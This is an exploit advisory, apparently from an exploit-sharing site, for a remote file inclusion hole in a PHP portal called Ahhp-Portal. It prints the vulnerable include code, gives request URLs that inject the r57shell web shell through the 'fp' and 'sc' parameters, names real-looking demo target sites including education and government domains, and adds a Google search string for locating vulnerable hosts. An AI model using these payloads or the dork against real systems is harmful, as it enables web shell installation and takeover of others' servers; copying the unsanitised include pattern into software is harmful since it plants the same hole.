Ahhp-Portal Remote File Inclusion
SЭTE:www.ahhope.org
Demo:http://xinan.ahtcm.edu.cn
Demo2http://www.hfspaq.gov.cn
Vul Code:
<?
if ($sc=='')
include($fp.".php");
else
include($sc."/".$fp.".php");
?>
example:
http://site/page.php?fp=r57shell?
http://site/page.php?sc=r57shell?
////////////////////////////////////////////////////
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : expw0rm.com
###############################################
Google :
"page.php?fp"
// Exploit Worm www.expw0rm.com